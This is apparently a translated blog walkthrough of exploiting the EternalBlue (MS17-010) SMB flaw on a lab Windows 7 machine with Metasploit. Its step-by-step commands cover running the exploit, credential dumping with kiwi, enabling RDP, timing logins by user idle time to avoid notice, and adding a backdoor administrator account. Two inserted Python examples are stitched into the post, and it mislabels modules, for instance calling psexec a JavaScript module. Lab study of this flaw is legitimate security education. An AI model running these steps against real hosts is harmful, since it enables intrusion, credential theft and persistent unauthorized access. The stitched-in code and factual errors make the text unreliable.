明国三年一场雨


Kali--MSF-EternalBlue In-Depth Analysis (Reproduction, Demonstration, Remote, Backdoor, Packing, Fix)

  1. Overview of Eternal Blue
    Eternal Blue, which broke out on the evening of April 14, 2017, is a vulnerability in the SMB protocol of Windows systems; exploiting it yields the highest level of system privileges and control of the compromised computer. On May 12, 2017, criminals used a modified "Eternal Blue" to build the WannaCry program, which caused widespread damage worldwide and affected institutions such as schools, large enterprises, and governments; the only way to recover the files was to pay a high ransom. However, Microsoft patched the program shortly after its release.

  2. SMB Protocol
    SMB (Server Message Block) is a client/server, request/response protocol. Through SMB, files, printers, named pipes, and other resources can be shared between computers; the Network Neighborhood on a Windows computer relies on it. SMB works at the application and session layers and runs on top of TCP/IP, using TCP port 139 and TCP port 445.

  3. Preparation
    Virtual machine: VMware
    Target machine: Windows 7 (IP: 192.168.184.138); image download: https://msdn.itellyou.cn/
    Attacker machine: Kali (IP: 192.168.184.130)
    Tools: nmap and Metasploit (MSF) in Kali

  4. Vulnerability Reproduction

    1. Host discovery
      a. Precondition: disable the firewall on Win7.

      If the firewall is not disabled, nmap may be unable to scan its ports and MSF may be unable to exploit the Eternal Blue vulnerability.


      You can use ipconfig and ifconfig to check the IP addresses of Win7 and Kali respectively:

      (Screenshots: ipconfig output on Win7, ifconfig output on Kali)

    2. Host discovery using nmap in Kali

      IP address: +


      Class A: 10.0.0.0~10.255.255.255
      Class B: 172.16.0.0~172.31.255.255
      Class C: 192.168.0.0~192.168.255.255
      /24 means 24 leading one bits, i.e. a subnet mask of 255.255.255.0
      192.168.184.0/24: the number after "/" is the mask length applied to the preceding IP address; it determines how many of the low-order bits at the back can vary between hosts.

      nmap -sP 192.168.184.0/24  # -sP: ping scan (host discovery only)
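As an added worked example (not code from the original post), the /24 arithmetic explained above done with plain bit operations: mask from prefix length, network and broadcast address, whether the Win7 and Kali addresses used in this post share the same /24, and whether an address falls in one of the private ranges listed. The prefix lengths /8, /12 and /16 for those three ranges are my assumption for expressing the listed ranges as CIDR blocks.

```python
# Added example: CIDR arithmetic for the /24 notation explained above.
# Not code from the original post; the addresses are the ones the post uses.

def ip_to_int(ip: str) -> int:
    """Pack a dotted-quad string into a 32-bit integer."""
    octets = [int(x) for x in ip.split(".")]
    if len(octets) != 4 or any(not 0 <= o <= 255 for o in octets):
        raise ValueError(f"bad IPv4 address: {ip}")
    return (octets[0] << 24) | (octets[1] << 16) | (octets[2] << 8) | octets[3]

def int_to_ip(n: int) -> str:
    return ".".join(str((n >> shift) & 0xFF) for shift in (24, 16, 8, 0))

def prefix_to_mask(prefix: int) -> int:
    """/24 -> 24 leading one bits -> 0xFFFFFF00 (255.255.255.0)."""
    if not 0 <= prefix <= 32:
        raise ValueError("prefix length must be 0..32")
    return ((1 << prefix) - 1) << (32 - prefix)

def describe_cidr(cidr: str) -> dict:
    """Network, mask, broadcast and how many low bits can vary between hosts."""
    ip, prefix = cidr.split("/")
    prefix = int(prefix)
    mask = prefix_to_mask(prefix)
    net = ip_to_int(ip) & mask
    return {
        "network": int_to_ip(net),
        "mask": int_to_ip(mask),
        "broadcast": int_to_ip(net | (~mask & 0xFFFFFFFF)),
        "host_bits": 32 - prefix,          # bits "at the back" that can vary
        "addresses": 1 << (32 - prefix),   # includes network and broadcast
    }

def in_subnet(ip: str, cidr: str) -> bool:
    """True when ip shares the network bits of cidr."""
    net_ip, prefix = cidr.split("/")
    mask = prefix_to_mask(int(prefix))
    return (ip_to_int(ip) & mask) == (ip_to_int(net_ip) & mask)

# The Class A/B/C private ranges listed above, written as prefixes
# (assumption: 10/8, 172.16/12 and 192.168/16 cover exactly those ranges).
PRIVATE_RANGES = ("10.0.0.0/8", "172.16.0.0/12", "192.168.0.0/16")

def is_private(ip: str) -> bool:
    return any(in_subnet(ip, r) for r in PRIVATE_RANGES)

if __name__ == "__main__":
    print(describe_cidr("192.168.184.0/24"))
    print(in_subnet("192.168.184.138", "192.168.184.0/24"),
          in_subnet("192.168.184.130", "192.168.184.0/24"))
```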
      
    3. Host discovery using Metasploit (MSF) in Kali

      msfconsole                                 // Start MSF
      use auxiliary/scanner/discovery/arp_sweep  // Use the module
      set rhosts 192.168.184.0/24   // Set the scan range
      set threads 50             // Increase the threads
      run                        // Run
      

      In MSF, search for the Eternal Blue modules by entering search ms17-010 (MS17-010 is Microsoft's identifier for Eternal Blue).


      1. blue is the Eternal Blue vulnerability.
      2. psexec is an exploitable JavaScript (JS) module.
      3. command runs cmd.
      4. The last one is a detection module.

      a. First, let's use the detection module to see whether our Win7 machine may be vulnerable.

      use exploit/windows/smb/ms17_010_eternalblue
      show options
      set rhosts 192.168.184.138
      exploit   // or equivalently: run
      


      If the exploit succeeds, a meterpreter > prompt appears.
      Meterpreter is an extension module of Metasploit that can call Metasploit functions to penetrate the target system more deeply, such as entering cmd, capturing the screen, uploading/downloading files, creating persistent backdoors, etc.

      meterpreter > shell
      chcp 65001  // Convert the encoding to avoid garbled characters
      ipconfig  # View IP
      whoami    # View the current username
      
    4. Capture the screen

      meterpreter > screenshot   # Take a screenshot
      


    5. Upload files

      meterpreter > upload user.txt c://
      


    6. Remote login
      View passwords using the kiwi module (this requires system administrator privileges):

      meterpreter > load kiwi // Load the kiwi module
      Loading extension kiwi...Success.
      creds_all  # List all credentials
      exit   # Exit
      


      Start port 3389 of the target machine with MSF

      By default, Windows Remote Desktop is not allowed to connect:


      We can't just go and manually allow remote connections on Win7; otherwise, how could we call ourselves hackers, hahaha...

      Open port 3389 on Win7 (the Remote Desktop Protocol port) and run the remote connection command:

      meterpreter > run post/windows/manage/enable_rdp  // Enable port 3389 Remote Desktop on the target host
      meterpreter > idletime  // Check the idle time of the remote user, and perform remote login when the idle time is long to reduce the risk of being discovered
      


      root@kali:~# rdesktop 192.168.184.138  // Use the rdesktop command to remotely connect to the desktop
      

      Logging in this way uses the existing Win7 account and kicks out user k, who is currently logged in on Win7.
      So we create a new user for the login instead:

      meterpreter > shell            # Enter the command line
      net user kill 123 /add         # Create a new user kill with password 123
      net  localgroup  administrators kill /add # Add the user kill to the local administrators group of Win7 to obtain administrator privileges
      net user               # View users
      
      root@kali:~# rdesktop 192.168.184.138  // Use the rdesktop command to remotely connect to the desktop
      
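As an added example from the defender's side (not code from the original post), a small Python detector that runs over constructed, simplified process-audit lines and flags the account-creation pattern shown above: a `net user ... /add` followed by `net localgroup administrators ... /add` for the same account on the same host within a short window. The key=value log format and the sample lines are assumptions made for this example.

```python
import re
from datetime import datetime

# Constructed sample audit records (not real logs), one process start per line,
# in a simplified key=value format assumed for this example.
SAMPLE_LOG = """\
2017-05-12T10:00:01 host=WIN7 user=k cmd="ipconfig"
2017-05-12T10:00:09 host=WIN7 user=SYSTEM cmd="chcp 65001"
2017-05-12T10:00:12 host=WIN7 user=SYSTEM cmd="net user kill 123 /add"
2017-05-12T10:00:15 host=WIN7 user=SYSTEM cmd="net localgroup administrators kill /add"
2017-05-12T10:05:00 host=WIN7 user=Administrator cmd="net user alice Pa55 /add"
2017-05-12T10:06:00 host=WIN7 user=Administrator cmd="net localgroup administrators bob /add"
"""

LINE_RE = re.compile(r'^(?P<ts>\S+) host=(?P<host>\S+) user=(?P<user>\S+) cmd="(?P<cmd>[^"]*)"$')
USER_ADD = re.compile(r'^net\s+user\s+(\S+)\s+\S+\s+/add\b', re.I)
ADMIN_ADD = re.compile(r'^net\s+localgroup\s+administrators\s+(\S+)\s+/add\b', re.I)

def parse_events(log_text: str):
    """Yield one dict per well-formed line; malformed lines are skipped."""
    for m in filter(None, map(LINE_RE.match, log_text.splitlines())):
        ev = m.groupdict()
        ev["ts"] = datetime.fromisoformat(ev["ts"])
        yield ev

def detect_rogue_admins(log_text: str, window_s: int = 300) -> list:
    """Alert when an account is created with `net user ... /add` and then added
    to the local administrators group on the same host within window_s seconds."""
    created = {}   # (host, account) -> (creation time, user who ran the command)
    alerts = []
    for ev in parse_events(log_text):
        m = USER_ADD.match(ev["cmd"])
        if m:
            created[(ev["host"], m.group(1).lower())] = (ev["ts"], ev["user"])
            continue
        m = ADMIN_ADD.match(ev["cmd"])
        if not m or (key := (ev["host"], m.group(1).lower())) not in created:
            continue   # group change with no matching creation: not this pattern
        t0, who = created[key]
        delta = (ev["ts"] - t0).total_seconds()
        if 0 <= delta <= window_s:
            alerts.append({
                "host": ev["host"], "account": m.group(1), "created_by": who,
                "seconds_between": delta,
                # net.exe running as SYSTEM is rarely an administrator at the keyboard
                "severity": "high" if who.upper() == "SYSTEM" else "medium",
            })
    return alerts
```

Real process-creation auditing (for example Windows event 4688 with command-line logging enabled) gives the same fields; only the line parser would change.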